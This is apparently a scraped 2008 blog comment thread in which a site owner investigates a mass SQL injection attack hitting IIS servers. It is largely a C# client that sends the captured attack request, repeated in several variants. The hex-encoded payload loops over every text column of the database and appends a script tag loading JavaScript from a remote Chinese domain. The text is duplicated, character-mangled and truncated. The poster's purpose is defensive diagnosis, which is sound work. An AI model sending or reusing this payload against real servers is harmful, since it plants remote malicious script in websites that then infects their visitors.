//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX //XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX //XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX //XXXXXXXXXXXXXXXXXXXXXXXXXXXXX"; // Does not hang (only minor mods to long query). //String inject_str = "GET /Index.htm?';DECLARE%20@S%20CHAR(4000);SET%20@S=XAST(Vx4445434C //415245204054207661726368617228323535292C4043207661726368617228 //3430303029204445434C415245205461626C655F437572736F722043555253 //4F5220464F522073656C65637420612E6E616D652C622E6E616D652066726 //F6D207379736F626A6563747320612C737973636F6C756D6E7320622077686 //5726520612E69643D622E696420616E6420612E78747970653D27752720616 //E642028622E78747970653D3939206F7220622E78747970653D3335206F722 //0622E78747970653D323331206F7220622E78747970653D31363729204F504 //54E205461626C655F437572736F72204645544348204E4558542046524F4D2 //0205461626C655F437572736F7220494E544F2040542C4043205748494C45 //28404046455443485F5354415455533D302920424547494E20657865632827 //757064617465205B272B40542B275D20736574205B272B40432B275D3D5B2 //72B40432B275D2B2727223E3C2F7469746C653E3C73637269707420737263 //3D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2 //F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74 //206C696B6520272725223E3C2F7469746C653E3C736372697074207372633 //D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F //7363726970743E3C212D2D272727294645544348204E4558542046524F4D2 // //0205461626C655F437572736F7220494E544F2040542C404320454E4420434 //C4F5345205461626C655F437572736F72204445414C4C4F43415445205461 //626C655F437572736F72%20AS%20AHAR(4000));QXEC(QS);"; //String inject_str = "GET /Index.htm?';DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''\"><!--'' where '+@C+' not like ''%\">--> I came across this exploit attempt in my server logs today, and spent the day investigating. While I wasn’t negatively impacted by the exploit, one thing is still VERY puzzling to me:

Marc Funaro (poster #5 above) indicated that he was able to stop the exploits cold by using ISAPI ReWrite (ISRW) to check for the presence of things like “CAST(4000)” in the URL, etc. I had the same idea, and for some reason, this approach doesn’t work on my end — which is what’s puzzling me… (Server is W2K3, IIS6).

As a test, I put a ReWrite rule in place to redirect any and all requests to my site to a bogus URL like fofofoxoxoxo.com. I then pointed a browser (both IE and FF) to the URL in question:

http://www.mysite.com/Index.htm?’DECLARE%20@S%20CHAR(4000)…EXEC(@S);

The browsers each sat there for a few minutes, and then timed out. Odd. I chopped the URL down to only:

http://www.mysite.com/Index.htm?’DECLARE%20@S%20CHAR(4000)

and I was redirected as per my ISRW rule.

My next thought was that perhaps the browsers were getting tripped up with the multiple @ signs in there, trying to resolve some other IP address using the long 0x… CAST as the address. So, I then whipped up a quick C# program to perform the GET requests and dump back the output. Now things got VERY strange…

With the ISRW rule in place still redirecting ALL requests to mysite.com to fofofoxoxo.com, sending the SQL injection request via my C# app still caused the request to timeout, as if something on the server was trying to do something with the request before any of the ISAPI filters. I confirmed that ISAPI_REWRITE was the first filter in the execution chain, and it was(is). So — what the heck is the server doing with the request?

I continued to send variations of the SQL inject string to the server, including:

* One in which I changed CAST to XAST and EXEC to QXEC. Everything else was the same. This request did NOT timeout on the server!

* One in which I changed the contents of the CAST(…) from 0×4445435… to 0×11111… (same length data). This request did NOT timeout on the server!

* Several in which I progressively chopped pieces off the end of the CAST(…) data. After the string got sufficiently short (the exact length, I don’t recall), these requests stopped timing out on the server.

All of this has left me quite puzzled. With ISAPI_REWRITE being the first filter in my list, what exactly is going on on the server end that causes the request to timeout for the SQL inject request in question? Even with a rule in place to redirect ALL requests elsewhere, some requests (like the SQL inject) never get processed. WHY? What is going on?

For reference, here is the C# source for those interested in trying it themselves (replace mysite.com with your own site.)

—-

using System;
using System.Net.Sockets;
public class Client
{
static public void pause()
{
Console.WriteLine( “\r\n***** Done *****\r\n” );
Console.ReadKey();
}

static public void Main(string[] Args)
{
TcpClient socketForServer;
try
{
socketForServer = new TcpClient(”www.mysite.com”, 80);
}
catch
{
Console.WriteLine(”Failed to connect to server at {0}:999″, “mysite.com”);
pause();
return;
}
NetworkStream networkStream = socketForServer.GetStream();
System.IO.StreamReader streamReader =
new System.IO.StreamReader(networkStream);
System.IO.StreamWriter streamWriter =
new System.IO.StreamWriter(networkStream);
try
{
string outputString;
// read the data from the host and display it
{

//streamWriter.WriteLine(”GET / HTTP/1.1\r\nHost: www.mysite.com\r\n\r\n”);
//SET%20@S=CAST(0×4445434C415245204054207661726368617228323535292
//C40432076617263686172283430303029204445434C415245205461626C655F437
//572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6
//E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E732
//06220776865726520612E69643D622E696420616E6420612E78747970653D27752
//720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7
//220622E78747970653D323331206F7220622E78747970653D31363729204F50454
//E205461626C655F437572736F72204645544348204E4558542046524F4D2020546
//1626C655F437572736F7220494E544F2040542C4043205748494C4528404046455
//443485F5354415455533D302920424547494E20657865632827757064617465205
//B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B27272
//23E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F616263
//2E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D27272
//0776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746
//C653E3C736372697074207372633D22687474703A2F2F6162632E766572796E782
//E636E2F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204
//E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404
//320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415
//445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);

// Hangs:
//String inject_str = “GET /Index.htm?’;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0×4445434C41
//5245204054207661726368617228323535292C4043207661726368617228343030
//3029204445434C415245205461626C655F437572736F7220435552534F5220464F
//522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F62
//6A6563747320612C737973636F6C756D6E73206220776865726520612E69643D62
//2E696420616E6420612E78747970653D27752720616E642028622E78747970653D
//3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F
//7220622E78747970653D31363729204F50454E205461626C655F437572736F7220
//4645544348204E4558542046524F4D20205461626C655F437572736F7220494E54
//4F2040542C4043205748494C4528404046455443485F5354415455533D30292042
//4547494E20657865632827757064617465205B272B40542B275D20736574205B27
//2B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C73637269
//7074207372633D22687474703A2F2F6162632E766572796E782E636E2F772E6A73
//223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F
//74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22
//687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F73637269
//70743E3C212D2D272727294645544348204E4558542046524F4D20205461626C6
//55F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626
//C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72
//%20AS%20CHAR(4000));EXEC(@S);”;

// Does not hang:
//String inject_str = “GET /Index.htm?’;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0×4445434C4
//15245204054207661726368617228323535292C4043207661726AS%20CHAR(4000));”;

// Does not hang, despite being same length as the long query above.
//String inject_str = “GET /Index.htm?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXX”;

// Does not hang (only minor mods to long query).
//String inject_str = “GET /Index.htm?’;DECLARE%20@S%20CHAR(4000);SET%20@S=XAST(Vx4445434C
//415245204054207661726368617228323535292C4043207661726368617228
//3430303029204445434C415245205461626C655F437572736F722043555253
//4F5220464F522073656C65637420612E6E616D652C622E6E616D652066726
//F6D207379736F626A6563747320612C737973636F6C756D6E7320622077686
//5726520612E69643D622E696420616E6420612E78747970653D27752720616
//E642028622E78747970653D3939206F7220622E78747970653D3335206F722
//0622E78747970653D323331206F7220622E78747970653D31363729204F504
//54E205461626C655F437572736F72204645544348204E4558542046524F4D2
//0205461626C655F437572736F7220494E544F2040542C4043205748494C45
//28404046455443485F5354415455533D302920424547494E20657865632827
//757064617465205B272B40542B275D20736574205B272B40432B275D3D5B2
//72B40432B275D2B2727223E3C2F7469746C653E3C73637269707420737263
//3D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2
//F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74
//206C696B6520272725223E3C2F7469746C653E3C736372697074207372633
//D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F
//7363726970743E3C212D2D272727294645544348204E4558542046524F4D2
// //0205461626C655F437572736F7220494E544F2040542C404320454E4420434
//C4F5345205461626C655F437572736F72204445414C4C4F43415445205461
//626C655F437572736F72%20AS%20AHAR(4000));QXEC(QS);”;

//String inject_str = “GET /Index.htm?’;DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec(’update [’+@T+’] set [’+@C+’]=[’+@C+’]+”\”>

]]> By: Tom39 http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-10003 Tom39 Sat, 23 Aug 2008 20:42:28 +0000 http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-10003 C# app code above got truncated due to the line with the de-encoded CAST(...) string. Here's the app again, without that line. Sorry about that. ---- using System; using System.Net.Sockets; public class Client { static public void pause() { Console.WriteLine( "\r\n***** Done *****\r\n" ); Console.ReadKey(); } static public void Main(string[] Args) { TcpClient socketForServer; try { socketForServer = new TcpClient("www.mysite.com", 80); } catch { Console.WriteLine("Failed to connect to server at {0}:999", "mysite.com"); pause(); return; } NetworkStream networkStream = socketForServer.GetStream(); System.IO.StreamReader streamReader = new System.IO.StreamReader(networkStream); System.IO.StreamWriter streamWriter = new System.IO.StreamWriter(networkStream); try { string outputString; // read the data from the host and display it { //streamWriter.WriteLine("GET / HTTP/1.1\r\nHost: www.mysite.com\r\n\r\n"); //SET%20@S=CAST(0x4445434C41524520405420766172636861722832353529 //2C40432076617263686172283430303029204445434C415245205461626C655F //437572736F7220435552534F5220464F522073656C65637420612E6E616D652C //622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C75 //6D6E73206220776865726520612E69643D622E696420616E6420612E78747970 //653D27752720616E642028622E78747970653D3939206F7220622E787479706 //53D3335206F7220622E78747970653D323331206F7220622E78747970653D313 //63729204F50454E205461626C655F437572736F72204645544348204E4558542 //046524F4D20205461626C655F437572736F7220494E544F2040542C404320574 //8494C4528404046455443485F5354415455533D302920424547494E206578656 //32827757064617465205B272B40542B275D20736574205B272B40432B275D3D5 //B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633 //D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F736 //3726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696 //B6520272725223E3C2F7469746C653E3C736372697074207372633D226874747 //03A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743 //E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F4 //37572736F7220494E544F2040542C404320454E4420434C4F5345205461626C6 //55F437572736F72204445414C4C4F43415445205461626C655F437572736F72% //20AS%20CHAR(4000));EXEC(@S); // Hangs: //String inject_str = "GET /Index.htm?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C41524 //5204054207661726368617228323535292C4043207661726368617228343030 //3029204445434C415245205461626C655F437572736F7220435552534F52204 //64F522073656C65637420612E6E616D652C622E6E616D652066726F6D20737 //9736F626A6563747320612C737973636F6C756D6E7320622077686572652061 //2E69643D622E696420616E6420612E78747970653D27752720616E642028622 //E78747970653D3939206F7220622E78747970653D3335206F7220622E787479 //70653D323331206F7220622E78747970653D31363729204F50454E205461626 //C655F437572736F72204645544348204E4558542046524F4D20205461626C65 //5F437572736F7220494E544F2040542C4043205748494C45284040464554434 //85F5354415455533D302920424547494E20657865632827757064617465205B //272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B272 //7223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F61 //62632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2 //D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C //2F7469746C653E3C736372697074207372633D22687474703A2F2F6162632E7 //66572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D272727 //294645544348204E4558542046524F4D20205461626C655F437572736F72204 //94E544F2040542C404320454E4420434C4F5345205461626C655F437572736F //72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHA //R(4000));EXEC(@S);"; // Does not hang: //String inject_str = "GET /Index.htm?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C41 //5245204054207661726368617228323535292C4043207661726AS%20CHAR(4000));"; // Does not hang, despite being same length as the long query above. //String inject_str = "GET /Index.htm?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX //XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX //XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX //XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX //XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX //XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX //XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX //XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX //XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX //XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX //XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX //XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX //XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX //XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX //XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX //XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX //XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX //XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX //XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX //XXXXXX"; // Does not hang (only minor mods to long query). //String inject_str = "GET /Index.htm?';DECLARE%20@S%20CHAR(4000);SET%20@S=XAST(Vx4445434C4 //15245204054207661726368617228323535292C40432076617263686172283430303029204 //445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637 //420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C7379736 //36F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653 //D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F722 //0622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626 //C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736 //F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D30292 //0424547494E20657865632827757064617465205B272B40542B275D20736574205B272B404 //32B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C73637269707420737263 //3D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F736372697074 //3E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2 //F7469746C653E3C736372697074207372633D22687474703A2F2F6162632E766572796E782 //E636E2F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542 //046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4 //F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F4375727 //36F72%20AS%20AHAR(4000));QXEC(QS);"; // Does not hang, despite being same length as original, with only the // CAST(...) contents changed. //String inject_str = "GET /Index.htm?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4444444444444 //4444444444444444444444444444444444444444444444444444444444444444 //4444444444444444444444444444444444444444444444444444444444444444 //4444444444444444444444444444444444444444444444444444444444444444 //4444444444444444444444444444444444444444444444444444444444444444 //4444444444444444444444444444444444444444444444444444444444444444 //4444444444444444444444444444444444444444444444444444444444444444 //4444444444444444444444444444444444444444444444444444444444444444 //4444444444444444444444444444444444444444444444444444444444444444 //4444444444444444444444444444444444444444444444444444444444444444 //4444444444444444444444444444444444444444444444444444444444444444 //4444444444444444444444444444444444444444444444444444444444444444 //4444444444444444444444444444444444444444444444444444444444444444 //4444444444444444444444444444444444444444444444444444444444444444 //4444444444444444444444444444444444444444444444444444444444444444 //4444444444444444444444444444444444444444444444444444444444444444 //4444444444444444444444444444444444444444444444444444444444444444 //4444444444444444444444444444444444444444444444444444444444444444 //4444444444444444444444444444444444444444444444444444444444444444 //4444444444444444444444444444444%20AS%20CHAR(4000));EXEC(@S);"; String inject_str = "GET /Index.htm?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C //415245204054207661726368617228323535292C40432076617263686172283 //430303029204445434C415245205461626C655F437572736F7220435552534F //5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D //207379736F626A6563747320612C737973636F6C756D6E7320622077686572 //6520612E69643D622E696420616E6420612E78747970653D27752720616E642 //028622E78747970653D3939206F7220622E78747970653D3335206F7220622E //78747970653D323331206F7220622E78747970653D31363729204F50454E205 //461626C655F437572736F72204645544348204E4558542046524F4D20205461 //626C655F437572736F7220494E544F2040542C4043205748494C45284040464 //55443485F5354415455533D302920424547494E206578656328277570646174 //65205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275 //D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A //2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3 //C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725 //223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F616 //2632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D //272727294645544348204E4558542046524F4D20205461626C655F437572736 //F7220494E544F2040542C404320454E4420434C4F5345205461626C655F4375 //72736F72204445414C4C4F43415445205461626C655F437572736F72%20AS //%20CHAR(4000));EXEC(@S);"; String final_str = inject_str + " HTTP/1.1\r\nHost: www.mysite.com\r\n\r\n"; Console.WriteLine(final_str); streamWriter.WriteLine( final_str ); streamWriter.Flush(); for (; ; ) { if (streamReader.Peek() != -1) { outputString = streamReader.ReadLine(); if (outputString != null) { Console.WriteLine(outputString); } else { break; } } else { break; } } } } catch { Console.WriteLine("Exception reading from Server"); pause(); } // tidy up networkStream.Close(); pause(); } } C# app code above got truncated due to the line with the de-encoded CAST(…) string. Here’s the app again, without that line. Sorry about that.

—-

using System;
using System.Net.Sockets;
public class Client
{
static public void pause()
{
Console.WriteLine( “\r\n***** Done *****\r\n” );
Console.ReadKey();
}

static public void Main(string[] Args)
{
TcpClient socketForServer;
try
{
socketForServer = new TcpClient(”www.mysite.com”, 80);
}
catch
{
Console.WriteLine(”Failed to connect to server at {0}:999″, “mysite.com”);
pause();
return;
}
NetworkStream networkStream = socketForServer.GetStream();
System.IO.StreamReader streamReader =
new System.IO.StreamReader(networkStream);
System.IO.StreamWriter streamWriter =
new System.IO.StreamWriter(networkStream);
try
{
string outputString;
// read the data from the host and display it
{

//streamWriter.WriteLine(”GET / HTTP/1.1\r\nHost: www.mysite.com\r\n\r\n”);
//SET%20@S=CAST(0×4445434C41524520405420766172636861722832353529
//2C40432076617263686172283430303029204445434C415245205461626C655F
//437572736F7220435552534F5220464F522073656C65637420612E6E616D652C
//622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C75
//6D6E73206220776865726520612E69643D622E696420616E6420612E78747970
//653D27752720616E642028622E78747970653D3939206F7220622E787479706
//53D3335206F7220622E78747970653D323331206F7220622E78747970653D313
//63729204F50454E205461626C655F437572736F72204645544348204E4558542
//046524F4D20205461626C655F437572736F7220494E544F2040542C404320574
//8494C4528404046455443485F5354415455533D302920424547494E206578656
//32827757064617465205B272B40542B275D20736574205B272B40432B275D3D5
//B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633
//D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F736
//3726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696
//B6520272725223E3C2F7469746C653E3C736372697074207372633D226874747
//03A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743
//E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F4
//37572736F7220494E544F2040542C404320454E4420434C4F5345205461626C6
//55F437572736F72204445414C4C4F43415445205461626C655F437572736F72%
//20AS%20CHAR(4000));EXEC(@S);

// Hangs:
//String inject_str = “GET /Index.htm?’;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0×4445434C41524
//5204054207661726368617228323535292C4043207661726368617228343030
//3029204445434C415245205461626C655F437572736F7220435552534F52204
//64F522073656C65637420612E6E616D652C622E6E616D652066726F6D20737
//9736F626A6563747320612C737973636F6C756D6E7320622077686572652061
//2E69643D622E696420616E6420612E78747970653D27752720616E642028622
//E78747970653D3939206F7220622E78747970653D3335206F7220622E787479
//70653D323331206F7220622E78747970653D31363729204F50454E205461626
//C655F437572736F72204645544348204E4558542046524F4D20205461626C65
//5F437572736F7220494E544F2040542C4043205748494C45284040464554434
//85F5354415455533D302920424547494E20657865632827757064617465205B
//272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B272
//7223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F61
//62632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2
//D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C
//2F7469746C653E3C736372697074207372633D22687474703A2F2F6162632E7
//66572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D272727
//294645544348204E4558542046524F4D20205461626C655F437572736F72204
//94E544F2040542C404320454E4420434C4F5345205461626C655F437572736F
//72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHA
//R(4000));EXEC(@S);”;

// Does not hang:
//String inject_str = “GET /Index.htm?’;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0×4445434C41
//5245204054207661726368617228323535292C4043207661726AS%20CHAR(4000));”;

// Does not hang, despite being same length as the long query above.
//String inject_str = “GET /Index.htm?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
//XXXXXX”;

// Does not hang (only minor mods to long query).
//String inject_str = “GET /Index.htm?’;DECLARE%20@S%20CHAR(4000);SET%20@S=XAST(Vx4445434C4
//15245204054207661726368617228323535292C40432076617263686172283430303029204
//445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637
//420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C7379736
//36F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653
//D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F722
//0622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626
//C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736
//F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D30292
